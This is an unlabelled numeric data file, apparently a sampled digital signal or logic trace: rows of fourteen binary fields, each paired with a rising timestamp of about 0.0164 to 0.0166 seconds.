0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362416e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362444e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362468e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362492e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362516e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362540e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362564e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362592e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362616e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362644e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362668e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362692e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362716e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362740e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362764e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362792e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362816e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362844e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362868e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362892e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362916e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362940e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362964e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362988e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363012e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363040e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363064e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363092e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363116e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363140e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363164e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363188e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363212e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363240e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363264e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363292e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363316e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363340e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363364e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363388e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363412e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363440e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363464e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363492e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363516e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363540e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363564e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363588e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363612e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363640e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363664e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363692e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363716e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363740e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363764e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6363792e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6363816e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6363820e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,1.6488548e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.6488776e-02 1,0,1,1,0,1,0,0,0,1,0,1,0,1,1.6488804e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.6488832e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,1,1.6489144e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.6489172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6489176e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6489196e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6489220e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6489244e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6489268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6489292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6489320e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6489344e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6489372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489380e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489396e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489420e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489444e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489468e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489492e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489520e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489544e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489644e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6489652e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6489696e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6489720e-02 1,0,1,1,0,1,0,0,0,0,0,0,0,0,1.6489724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489728e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489744e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489844e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489868e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489892e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489916e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489944e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6489972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6489996e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490020e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490044e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490068e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490092e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490116e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490144e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490172e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490192e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6490220e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6490268e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6490292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490316e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490344e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490444e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490468e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490492e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490520e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490544e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490644e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490696e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490720e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490744e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490844e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490868e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490892e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6490920e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6490944e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6490972e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6490996e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6491020e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6491044e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6491068e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6491092e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6491120e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6491144e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6491172e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6491196e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6491220e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6491268e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6491292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491320e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491344e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491444e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491468e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491492e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491516e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491544e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491644e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491668e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491692e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491716e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491744e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491820e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491844e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491868e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491892e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491916e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491944e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6491972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6491992e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492020e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492044e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492068e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492092e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492116e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492140e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492192e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6492220e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.6492268e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6492292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492316e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492340e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492392e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492444e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492468e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492492e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492516e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492540e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492592e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492644e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492668e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492692e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492716e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492740e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492792e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492820e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492844e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492892e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492916e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492940e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6492972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6492992e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493020e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493044e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493068e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493092e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493116e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493140e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493172e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493192e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493220e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493244e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493316e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493340e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493392e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493420e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493444e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493468e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493492e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493516e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493540e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493592e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493644e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493668e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493692e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493716e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493740e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493792e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493844e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493868e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493892e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493916e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493944e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6493972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6493992e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494020e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494044e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494068e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494092e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494116e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494140e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494164e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494192e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494220e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494244e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494316e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494340e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494368e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494392e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494420e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494444e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494468e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494492e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494516e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494540e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494568e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494592e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494644e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494668e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494692e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494716e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494740e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494768e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494792e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494844e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494868e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494892e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494916e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494940e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6494968e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6494992e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495020e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495044e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495068e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495092e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495116e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495140e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495168e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495192e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495220e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495244e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495316e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495340e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495368e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495392e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495420e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495444e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495468e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495492e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495516e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495540e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495568e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495592e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495644e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495668e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6495692e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6495716e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.6495724e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.6620452e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,1.6620644e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6620664e-02 0,1,1,1,0,1,0,0,0,1,0,1,0,1,1.6620684e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6620708e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,1,1.6621020e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6621044e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,1,1.6621048e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6621052e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6621068e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6621092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6621116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6621140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6621168e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6621192e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6621220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6621244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6621268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621284e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621368e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621392e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621468e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,1.6621472e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6621476e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6621492e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6621516e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6621568e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6621592e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621600e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621768e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621792e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621916e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621940e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6621964e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6621988e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622016e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622068e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,1.6622092e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6622096e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6622144e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6622164e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,1.6622172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622176e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622188e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622212e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622240e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622264e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622316e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622364e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622388e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622412e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622440e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622464e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622516e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6622520e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6622564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622668e-02 